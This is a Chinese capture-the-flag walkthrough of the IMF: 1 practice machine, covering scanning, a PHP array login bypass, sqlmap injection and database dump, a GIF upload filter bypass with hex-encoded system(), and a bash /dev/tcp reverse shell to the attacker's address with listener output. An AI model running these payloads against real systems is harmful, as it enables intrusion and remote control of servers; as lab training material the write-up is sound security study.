红队打靶练习:IMF: 1

目录

信息收集

1、arp

2、nmap

3、nikto

目录探测

gobuster

dirsearch

WEB

信息收集

get flag1

get flag2

get flag3

SQL注入

漏洞探测

脱库

get flag4

文件上传

反弹shell

提权

get flag5

get flag6

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.61.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.61.1    00:50:56:c0:00:08       VMware, Inc.
192.168.61.2    00:50:56:f0:df:20       VMware, Inc.
192.168.61.131  00:50:56:3c:c7:9b       VMware, Inc.
192.168.61.254  00:50:56:ed:67:13       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.089 seconds (122.55 hosts/sec). 4 responded

2、nmap
端口扫描

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.61.131 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-16 16:31 CST
Nmap scan report for 192.168.61.131
Host is up (0.00056s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:50:56:3C:C7:9B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds


版本信息探测

──(root㉿ru)-[~/kali]
└─# nmap -sCV -O -A -p 80 192.168.61.131 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-16 16:38 CST
Nmap scan report for 192.168.61.131
Host is up (0.00051s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: IMF - Homepage
MAC Address: 00:50:56:3C:C7:9B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (87%), Linux 3.13 - 3.16 (87%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.61.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds


3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h http://192.168.61.131
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.61.131
+ Target Hostname:    192.168.61.131
+ Target Port:        80
+ Start Time:         2024-02-16 16:44:13 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-02-16 16:44:36 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

目录探测

gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.61.131 -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.61.131
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.61.131/images/]
/index.php            (Status: 200) [Size: 4797]
/contact.php          (Status: 200) [Size: 8649]
/projects.php         (Status: 200) [Size: 6574]
/css                  (Status: 301) [Size: 314] [--> http://192.168.61.131/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.61.131/js/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.61.131/fonts/]
/less                 (Status: 301) [Size: 315] [--> http://192.168.61.131/less/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 882248 / 882252 (100.00%)
===============================================================
Finished
===============================================================

dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.61.131 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.61.131/_24-02-16_16-46-31.txt

Target: http://192.168.61.131/

[16:46:31] Starting:
[16:46:31] 301 -  313B  - /js  ->  http://192.168.61.131/js/
[16:46:56] 200 -    2KB - /contact.php
[16:46:57] 301 -  314B  - /css  ->  http://192.168.61.131/css/
[16:47:02] 301 -  316B  - /fonts  ->  http://192.168.61.131/fonts/
[16:47:05] 301 -  317B  - /images  ->  http://192.168.61.131/images/
[16:47:20] 200 -    2KB - /projects.php

Task Completed

WEB

信息收集



发现联系人,这个用户名可能有用!收集起来!!

get flag1


在联系人的源码里面发现flag1

flag1{YWxsdGhlZmlsZXM=}



解码得到这个,看起来像一个目录!!


发现并不存在!看来线索是目录!!我们去源码里面收集一下目录!


这些看着太可疑了!我们解码一下!

        <script src="js/ZmxhZzJ7YVcxbVl.js"></script>
        <script src="js/XUnRhVzVwYzNS.js"></script>
        <script src="js/eVlYUnZjZz09fQ==.min.js"></script>


get flag2
   
   ┌──(root㉿ru)-[~/kali]
└─# echo "ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==" | base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}

好家伙,把base64编码目录放在一起解码。居然是flag2!!

flag2解码:

imfadministrator




尝试访问后,是个目录!!


译:

我无法使SQL正常工作,所以我硬编码了密码。它仍然非常安全。-罗杰


get flag3


尝试了很多次!使用工具进行爆破依然不行!用户名只有rmichaels可以用!!

看到源码的翻译,我突然想到了php的数组绕过!




成功了!多打ctf!!

flag3{Y29udGludWVUT2Ntcw==}解码:

continueTOcms



SQL注入

漏洞探测



感觉存在注入!!

┌──(root㉿ru)-[~/kali]
└─# sqlmap -u "http://192.168.61.131/imfadministrator/cms.php?pagename=upload" --threads 10 --cookie "PHPSESSID=j94gf81l5gacd60uq27hoqc2i6"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:39:46 /2024-02-16/

[17:39:46] [INFO] resuming back-end DBMS 'mysql'
[17:39:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pagename (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pagename=home' AND 5929=5929 AND 'OPxd'='OPxd

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: pagename=home' AND (SELECT 5670 FROM(SELECT COUNT(*),CONCAT(0x71767a6271,(SELECT (ELT(5670=5670,1))),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oEWi'='oEWi

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: pagename=home' AND (SELECT 2619 FROM (SELECT(SLEEP(5)))tVFy) AND 'xkdf'='xkdf

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: pagename=-8077' UNION ALL SELECT CONCAT(0x71767a6271,0x69694d646149717059546245524f736753694f64697452745263486c6f68684962645068496c4c41,0x7176787a71)#
---
[17:39:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[17:39:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.61.131'

[*] ending @ 17:39:46 /2024-02-16/


脱库
payload

sqlmap -u "http://192.168.61.131/imfadministrator/cms.php?pagename=upload" --threads 10 --cookie "PHPSESSID=j94gf81l5gacd60uq27hoqc2i6" --dbs -D admin -T pages -C pagedata,pagename --dump



得到目录  tutorials-incomplete  ??   尝试访问!!


get flag4



得到flag4{dXBsb2Fkcjk0Mi5waHA=}

解码:

uploadr942.php



文件上传


访问后是一个上传点!!


使用带有php后缀的会报错!文件太大也会报错!存在waf??


我们干脆写个phpinfo得了!


响应码为200!并且返回一串字符!!

1717afa8d2db


┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.61.131/imfadministrator/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.61.131/imfadministrator/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 337]
/images               (Status: 301) [Size: 334] [--> http://192.168.61.131/imfadministrator/images/]
/uploads              (Status: 301) [Size: 335] [--> http://192.168.61.131/imfadministrator/uploads/]
/cms.php              (Status: 200) [Size: 134]

uploads  !!



经过尝试,这个waf的拦截规则很有趣!首先图片类型的话只能上传gif,目前只有gif可以使用!而且图片不能过大,太大的话,waf会拦截!!
图片所包含的php函数必须是waf没有拦截的才行!

这些都是PHP.ini 配置文件中所添加的,不允许我们使用!!既然这样,我们可以构造system函数!不过我们需要将system函数进行十六进制转换!!

system  ---  \x73\x79\x73\x74\x65\x6d


上传成功! 这样我们就可以进行命令执行了!!!


反弹shell

payload

/bin/bash -c 'bash -i >%26/dev/tcp/192.168.61.128/1234 0>%261'


提权

get flag5
┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.61.131: inverse host lookup failed: Unknown host
connect to [192.168.61.128] from (UNKNOWN) [192.168.61.131] 56656
bash: cannot set terminal process group (1257): Inappropriate ioctl for device
bash: no job control in this shell
www-data@imf:/var/www/html/imfadministrator/uploads$ ls
ls
096eb934e639.png
12f62e48bf27.gif
1717afa8d2db.gif
1e2e31a630df.png
26073d903c06.gif
flag5_abc123def.txt
www-data@imf:/var/www/html/imfadministrator/uploads$ cat flag5_abc123def.txt
cat flag5_abc123def.txt
flag5{YWdlbnRzZXJ2aWNlcw==}

flag5{YWdlbnRzZXJ2aWNlcw==}

解码:agentservices


get flag6
涉及到溢出漏洞!目前还不会!学会了再来补!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/392716.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【力扣hot100】刷题笔记Day5

前言 回学校了&#xff0c;荒废了半天之后打算奋发图强猛猛刷题&#xff0c;找实习&#xff01;赚钱&#xff01;&#xff01; 560. 和为 K 的子数组 - 力扣&#xff08;LeetCode&#xff09; 前缀法 哈希表 这个题解解释比官方清晰&#xff0c;截个图方便看&#xff0c;另一…

慎投!2023年共124本SCI/SSCI被剔除汇总(附电子档下载目录)

2023年SCI/SSCI剔除期刊汇总 2023年3月20日&#xff0c;Web of Science核心期刊目录再次更新&#xff01;共有50本期刊被剔除出SCIE & SSCI期刊目录&#xff0c;其中大部分为Hindawi旗下期刊&#xff08;19本&#xff09;&#xff0c;引起不小的轰动&#xff01; 2023年全…

数据结构之时空复杂度

一、前言 1&#xff09;什么是数据结构 数据结构(Data Structure)是计算机存储、组织数据的方式&#xff0c;指相互之间存在一种或多种特定关系的数据元素的 集合。 2&#xff09;什么是算法 算法(Algorithm):就是定义良好的计算过程&#xff0c;他取一个或一组的值为输入&am…

计算机网络——14CDN

CDN 视频流化服务和CDN&#xff1a;上下文 视频流量&#xff1a;占据着互连网大部分的带宽 Netflix&#xff0c;YouTube&#xff1a;占据37%&#xff0c;16%的下行流量 挑战&#xff1a;规模性-如何服务~1B用户&#xff1f; 单个超级服务器无法提供服务&#xff08;为什么&am…

备战蓝桥杯---数学之博弈论基础1

目录 1.对称博弈 2.巴什博弈&#xff1a; 3.NIM博弈&#xff1a; 注意一个法则&#xff1a; 1.对称博弈 我们先看一个经典的例子&#xff1a; 下面是分析&#xff1a; 2.巴什博弈&#xff1a; 我们只要先手取1个&#xff0c;然后先手再去取5-刚刚后手的数字即可。 当石子数…

SHERlocked93 的 2021 年终总结

我还是和往年一样&#xff0c;总结发的又晚了一点&#xff0c;为什么又发这么晚呢&#xff0c;因为懒 年终总结 疫情之后时间时间过的太快了&#xff0c;不知道是不是只有我这样感觉。 四五月份去兰州玩了下&#xff08;其实是出差&#xff09;&#xff0c;终于看到了黄土高原&…

机器视觉与嵌入式技术:开拓自动驾驶和远程监控新视野

&#xff08;本文为简单介绍&#xff0c;观点源于网络&#xff09; 机器视觉系统是指利用计算机来模拟人眼的识别与判断。在自动驾驶和远程监控领域&#xff0c;机器视觉结合嵌入式技术的应用&#xff0c;不仅极大地提升了自动化水平&#xff0c;而且开辟了新的技术视野。 在…

迅为3A5000_7A2000开发板龙芯自主指令系统支持PCIE3.0、USB3.0、SATA3.0、HDMI、VGA等

性能强 采用全国产龙芯3A5000处理器&#xff0c;基于龙芯自主指令系统 (LoongArch)的LA464微结构&#xff0c;并进一步提升频率&#xff0c;降低功耗&#xff0c;优化性能。 桥片 采用龙芯 7A2000&#xff0c;支持PCIE 3.0、USB 3.0和 SATA 3.0.显示接口2 路、HDMI 和1路 VGA…

【ArcGIS微课1000例】0103:导出点、线、面要素的折点坐标值

点要素对应的是一个或者若干个坐标,线要素对应的是对个坐标值对应的点连起来,面要素是多个坐标值对应的点连起来构成的封闭多边形。本文讲述导出点的坐标值。 文章目录 一、点要素坐标导出1. 计算点坐标2. 导出点坐标二、线要素坐标导出1. 生成线要素折点2. 计算折点坐标3. 导…

一款服务于医院临床数据资源建设的平台,助力医疗信息化发展

随着医疗技术的不断发展&#xff0c;医院需要越来越多的临床数据来支持科研、教学和临床实践。然而&#xff0c;在传统的医疗系统中&#xff0c;数据分散、信息割裂、无法有效整合和共享。为了解决这一问题&#xff0c;临床数据资源整合平台应运而生。 临床数据资源整合平台是…

C++之内存对齐

目录 内存对齐 一、内存对齐解释 二、为什么要内存对齐&#xff1f; 三、内存对齐的三大规则 3.1、数据成员对齐规则 3.2、结构(或联合)的整体对齐规则 3.3、结构体作为成员 3.4、代码例子 内存对齐 一、内存对齐解释 对齐规则是按照成员的声明顺序&#xff0c;依次安排…

openGauss学习笔记-221 openGauss性能调优-确定性能调优范围-分析作业是否被阻塞

文章目录 openGauss学习笔记-221 openGauss性能调优-确定性能调优范围-分析作业是否被阻塞221.1 操作步骤 openGauss学习笔记-221 openGauss性能调优-确定性能调优范围-分析作业是否被阻塞 数据库系统运行时&#xff0c;在某些业务场景下查询语句会被阻塞&#xff0c;导致语句…

vue2+高德地图web端开发(二)

前言&#xff1a; 高德地图输入提示与 POI 搜索相关文档&#xff1a;输入提示与 POI 搜索-服务插件和工具-进阶教程-地图 JS API 2.0 | 高德地图API (amap.com) 输入提示-输入提示-示例中心-JS API 2.0 示例 | 高德地图API (amap.com) 创建输入框&#xff1a; 引入Element组…

java设计模式之解释器模式

解释器模式&#xff08;Interpreter Pattern&#xff09; 1.基本介绍 在编译原理中&#xff0c;一个算术表达式通过词法分析器形成词法单远&#xff0c;而这些词法单远再通过语法分析器构建语法分析树&#xff0c;最终形成一颗抽象的语法分析树&#xff0c;&#xff08;词法分…

Unity所有关于旋转的方法详解

前言&#xff1a;欧拉角和四元数的简单描述 我们在Inspector面板上看到的rotation其实是欧拉角&#xff0c; 我们将Inspector面板设置成Debug模式&#xff0c;此时看到的local Rotation才是四元数。 Unity中的欧拉旋转是按照Z-X-Y顺规执行的旋转&#xff0c;一组欧拉旋转过程中…

链表总结 -- 《数据结构》-- c/c++

链表的概念 链表是一种物理存储结构上非连续存储结构&#xff0c;数据元素的逻辑顺序是通过链表中的引用链接次序实现的 。 链表是一种通过指针串联在一起的线性结构&#xff0c;每一个节点由两部分组成&#xff0c;一个是数据域一个是指针域&#xff08;存放指向下一个节点的…

Windows 编译 yangfengzzz/fluid-engine-OpenVDB

我想将 OpenVDB 接入 doyubkim 的流体引擎 https://github.com/doyubkim/fluid-engine-dev 然后搜到已经有人做过这件事了 https://github.com/yangfengzzz/fluid-engine-OpenVDB Windows 编译 yangfengzzz/fluid-engine-OpenVDB 但是我是 windows&#xff0c;所以想要编译…

idea突然出现错误: “找不到或无法加载主类 @C:\Users\happ“解决方案

在公司敲代码时&#xff0c;编译器突然出现了以下报错&#xff0c;之前一直能正常运行 可以使用以下方法解决 找到启动类相关配置 找到Shorten command line,选择如下配置即可 进行到这里项目就能正常运行了&#xff0c;仅以此贴记录问题解决方案

高程 | 继承与派生(c++)

文章目录 &#x1f4da;继承的概念和语法&#x1f4da;派生类生成过程&#x1f4da;继承权限和继承方式&#x1f407;公有继承&#x1f407;私有继承&#x1f407;保护继承 &#x1f4da;类型转换规则&#x1f4da;派生类构造函数和析构函数&#x1f4da;继承中的静态成员特性&…

互联网加竞赛 基于设深度学习的人脸性别年龄识别系统

文章目录 0 前言1 课题描述2 实现效果3 算法实现原理3.1 数据集3.2 深度学习识别算法3.3 特征提取主干网络3.4 总体实现流程 4 具体实现4.1 预训练数据格式4.2 部分实现代码 5 最后 0 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 基于深度学习机器视觉的…